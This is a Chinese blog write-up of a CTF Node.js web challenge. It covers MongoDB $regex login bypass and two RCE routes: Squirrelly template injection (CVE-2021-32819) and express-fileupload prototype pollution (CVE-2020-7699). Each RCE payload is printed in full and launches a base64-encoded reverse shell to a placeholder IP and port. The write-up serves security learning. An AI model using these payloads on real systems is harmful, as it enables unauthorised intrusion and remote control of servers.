DASCTF NOV&&EzNode2的两种解法

最新推荐文章于 2023-08-02 16:23:36 发布
最新推荐文章于 2023-08-02 16:23:36 发布
阅读量349 收藏 1
点赞数 2
分类专栏: CTF WEB 文章标签: mongodb 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/128681193
版权

0x00

题挺好的,终于自己做出来了一道nodejs题

这题自己做出来的有两种解法,但是第一种应该就可以了,第二种有点复杂

涉及的知识点:

  • Mongodb注入
  • CVE-2021-32819
  • CVE-2020-7699

0x01 mongodb注入

参考文章:Nosql 注入从零到一

在源码中得知他是使用了mongoose模块进行的mongodb的服务

而且过滤了一些关键字

function filter(str) {
    return /gt|lt|lte|gte|eq|ne|where/.test(str) //正则匹配,如果匹配到就返回true ,过滤了< <= > >= = !=
}

但是没有过滤$regex,可以用正则匹配

从网页源码可以猜测,用户名为admin。但是不是,应该是以admin开头

payload:

POST: username[$regex]=^admin&password[$regex]=.*

0x02 使用 Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)

参考文章:https://cloud.tencent.com/developer/article/2035888

题目Squirrelly的版本刚好为V8.0.8

根据文章的讲解,就是要让传入squirrelly文件的值包含{"autoEscape":false,"defaultFilter":"e');xxxxxxxxxxc.l('F','e"}

由于题目中的是先进行拼接再json解析得到值,所以只需要构造一个就行,最好让结尾和原代码拼接,直接使用注释符://在这里没法成功

req.files.file.namereq.files.file.mimetype可以控,我用的是filename,因为mimietype有点问题

需要构造为

{"autoEscape":false,"defaultFilter":"e'); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo YmFzaCAtaSAmPiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE|base64 -d|bash');c.l('F','e"}
// bash -i &> /dev/tcp/IP/PORT 0>&1

数据包里修改filename为

Content-Disposition: form-data; name="file"; filename="\",\"autoEscape\":false,\"defaultFilter\":\"e'); require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo YmFzaCAtaSAmPiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE|base64 -d|bash');c.l('F','e"

得到shell

image-20230113234543607

方法二 使用原型链污染(CVE-2020-7699)

参考连接:

因为题目环境存在

app.use(fileUpload({ parseNested: true }));

且版本非常巧合的为1.1.7-alpha.4,所以可以使用这个漏洞

CVE-2020-7699本质来说就是原型链污染,而在CVE-2021-32819里的解析可以知道,他最后是覆盖env.defaultFilter的值进行的命令执行

而且前面是没有对env.defaultFilter进行赋值的

image-20230113235049154

然后CVE-2020-7699可以直接污染到Object对象,所以我们只要让Object.defaultFilter的值为上面的使用的代码,就可以进行反弹shell

数据包内,修改文件那里的数据

--88dd0b7e7d8aba36226b8fecfaf06e4c
Content-Disposition: form-data; name="__proto__.defaultFilter"

e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo YmFzaCAtaSAmPiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE|base64 -d|bash');//
--88dd0b7e7d8aba36226b8fecfaf06e4c--

他会返回No files were uploaded!,不用管,然后再访问一次页面,就可以得到shell

image-20230114000533215

v2ish1yan
关注
专栏目录
VOCtest_06-Nov-2007.tar
03-22
VOCtest_06-Nov-2007.tar
VOCtrainval_06-Nov-2007.part2.rar
11-12
Introduction The main goal of this challenge is to recognize objects from a number of visual object classes in realistic scenes (i.e. not pre-segmented objects). It is fundamentally a supervised ...
DASCTF NOV - re - babytea - writeup
Air_cat的博客
11-28 584
DASCTF NOV X联合出题人2022年度积分榜争夺赛逆向题babytea的writeup
DASCTF NOV X联合出题人2022年度积分榜争夺赛!Crypto Wp
mxx307的博客
12-03 948
DASCTF NOV X联合出题人2022年度积分榜争夺赛!Crypto Wp
DASCTF NOV X联合出题人2022年度积分榜争夺赛 RE-部分题解
Todog的博客
11-28 924
SMC&&TEA
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2700
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
InCTF 2021 Web
feng的博客
08-16 512
前言 太菜了,根本不会,笑死。6道Web,有三道是XSS,我一点XSS不会,直接哭了。 Raas 一个输入框,是post传的url,可以SSRF,根据dockerfile里的内容可以知道文件在/code/app.py,下载下来: url=file:///code/app.py from flask import Flask, request,render_template,request,make_response import redis import time import os from util
phoneme_advanced-mr2-dev-src-b97-20_nov_2008.zip
06-15
标题中的"phoneme_advanced-mr2-dev-src-b97-20_nov_2008.zip"指示了这是一个源代码压缩包,其中包含了“phoneme_advanced”项目的第2个重大修订版(MR2)的开发版本,版本号为b97,发布日期为2008年11月。...
sketch_nov2a.ino
11-02
sketch_nov2a.ino
Delphi 12 控件之Woll2Woll InfoPower 4K v23.0.2.1 (17 Nov 2023) for
最新发布
10-02
Woll2Woll InfoPower 4K v23.0.2.1 (17 Nov 2023) for Delphi 11 & 12 Athens Retail.7
BUUCTF--[NPUCTF2020]ezinclude
qq_46263951的博客
07-18 1596
进入页面后F12查看网页源码,根据提示我们可以知道经过md5编码后的name要与pass相同 经过测试可以发现name没有参数时和name有参数是的Hash值是不同的,猜测这里是将name编码后的值赋给了Hash 令name=1,pass为name为1时的Hash值即可,但发现直接跳转到404页面 这里需要使用BP拦截,可以看到给出一个php文件 打开后发现是个文件包含 ...
hznuCTF eznode
m0_64348326的博客
07-04 262
4.谷歌搜索该漏洞的exp:https://xz.aliyun.com/t/11859#toc-5。然后json格式发送即可。2.审计源码,挺简单的。大概就是在页面post传递一个json数据,会经过。变量中,最后判断该变量的shit值是否为真,然后调用。属性的内容,那么也就是我们需要将该属性污染成。1.页面提示尝试查看源码,最直观的就是。配置错误造成的源码泄露了,直接访问。函数很明显的一个原型链污染,而。函数在VM2沙箱中执行。函数解析,然后再通过。
weekly-反序列化两道CTF练习题
网络安全学习
04-12 2739
文章目录EZ-unserializePOP 光说不练假把式,做点题,本次是某天的weekly-ctf的两道反序列化 EZ-unserialize 这是一个User类,定义了三个魔术方法,我们上一篇文章介绍了分别在什么时候调用,反序列化重建对象时会调用wakeup函数,在结束时会调用destruct class User{ function __construct($name,$pass){ $this->name = $name; $this->pass
[GKCTF2020]EZ三剑客-EzNode
feng的博客
02-16 1015
前言 之前buu上刷到这题的时候,感觉是个前端的题,就绕过没看了。今天在某平台做红包题遇到了基本上考点一样的题目,在学长的指引下又把这题给做了一下,总的来说还算比较友好,因为我不会前端我也大致能看懂这题是啥意思。 WP 进入环境是个计算器,看一下源代码: const express = require('express'); const bodyParser = require('body-parser'); const saferEval = require('safer-eval'); // 2019
eznode漏洞实验复现
小白
08-02 153
eznode漏洞实验复现
CVE-2021-2109-LDAP远程代码执行漏洞
weixin_44533592的博客
03-05 3320
CVE-2021-2109-LDAP远程代码执行漏洞复现 ​ – 因果 2021.3.5 漏洞描述 2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、C
【漏洞通告】Windows 内核信息泄漏漏洞CVE-2021-31955
爱国小白帽
06-29 2764
漏洞名称 : Windows 内核信息泄漏漏洞 组件名称 : Windows 影响范围 : Windows 10 21h1/20h2/1809/1909/2004 Windows Server 2016 20h2/2004 Windows Server 2019 漏洞类型 : 信息泄漏 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远程 综合评价 : 1、用户认证:不需要用户认证 2、触发方式:本地 漏洞分析 1 组件****介绍 Microsoft Windows操作系统是美国微软公司研发的一
CVE-2020-7699漏洞分析
gental_z的博客
08-11 1804
CVE-2020-7699漏洞分析 一、简介 CVE-2020-7699:NodeJS模块代码注入 该漏洞完全是由于Nodejs的express-fileupload模块引起,该模块的1.1.8之前的版本存在原型链污染(Prototype Pollution)漏洞,当然,引发该漏洞,需要一定的配置:parseNested选项设置为true 该漏洞可以引发DOS拒绝服务攻击,配合ejs模板引擎,可以达到RCE的目的 二、漏洞源码分析 如果想要复现的话,需要下载低版本的express-fileupload模块
西湖论剑 2022复现
weixin_63231007的博客
03-03 1420
[西湖论剑 2022] Node Magical Login & [西湖论剑 2022] real_ez_node & [西湖论剑 2022] 扭转乾坤 & [西湖论剑 2022] unusual php
N170C2-L02 TFT LCD模块规格书
"CHI MEI N170C2 L02 V2.2 NOV 3 2006.pdf" 这篇文档是关于CHI MEI(奇美)公司的一款型号为N170C2-L02的TFT LCD(薄膜晶体管液晶显示器)的批准规范,版本为V2.2,发布日期为2006年11月3日。文档的编号是2405Z182...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值